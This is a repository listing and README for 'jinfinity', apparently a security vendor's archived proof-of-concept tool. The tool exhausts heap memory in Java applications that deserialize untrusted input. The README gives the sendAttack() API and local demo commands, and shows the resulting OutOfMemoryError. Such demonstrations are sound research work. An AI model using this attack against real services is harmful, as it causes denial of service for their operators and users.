https://github.com/contrast-security-oss/jinfinity

An API for consuming all the memory of Java apps using deserialization
https://github.com/contrast-security-oss/jinfinity

Last synced: 9 months ago
JSON representation

An API for consuming all the memory of Java apps using deserialization

• Host: GitHub
• URL: https://github.com/contrast-security-oss/jinfinity
• Owner: Contrast-Security-OSS
• License: bsd-3-clause
• Archived: true
• Created: 2015-11-24T21:45:47.000Z (over 10 years ago)
• Default Branch: master
• Last Pushed: 2016-01-10T01:01:38.000Z (over 10 years ago)
• Last Synced: 2025-09-30T19:00:00.033Z (9 months ago)
• Language: Java
• Homepage:
• Size: 7.81 KB
• Stars: 28
• Watchers: 9
• Forks: 12
• Open Issues: 1
• Metadata Files:
  • Readme: README.md
  • License: LICENSE

Awesome Lists containing this project

README

          
jinfinity

========

An API and demonstration program for consuming all the memory of applications that deserialize data from untrusted sources (like HTTP requests) using the Java serialization specification.

## How do I use this?

Use the com.contrastsecurity.jinfinity.JInfinity.java#sendAttack() API to push an unreasonably large serialized String to a target OutputStream. You'll need to figure out how to get the OutputStream of your target set up correctly.

## How can I run the demo program?

First, build the app:

```

git clone https://github.com/Contrast-Security-OSS/jinfinity.git

cd jinfinity

mvn clean package

```

To run the demo Jetty server, run this:

```

java -jar target/jinfinity-jar-with-dependencies.jar server

```

In another console, run the attacking client:

```

java -jar target/jinfinity-jar-with-dependencies.jar client

```

Within 30 seconds, the server will produce an OutOfMemoryError that looks something like this:

```

java.lang.OutOfMemoryError: Java heap space

	at java.lang.AbstractStringBuilder.expandCapacity(AbstractStringBuilder.java:99)

	at java.lang.AbstractStringBuilder.append(AbstractStringBuilder.java:518)

	at java.lang.StringBuffer.append(StringBuffer.java:307)

	at java.io.ObjectInputStream$BlockDataInputStream.readUTFSpan(ObjectInputStream.java:3044)

	at java.io.ObjectInputStream$BlockDataInputStream.readUTFBody(ObjectInputStream.java:2952)

	at java.io.ObjectInputStream$BlockDataInputStream.readLongUTF(ObjectInputStream.java:2935)

	at java.io.ObjectInputStream.readString(ObjectInputStream.java:1570)

```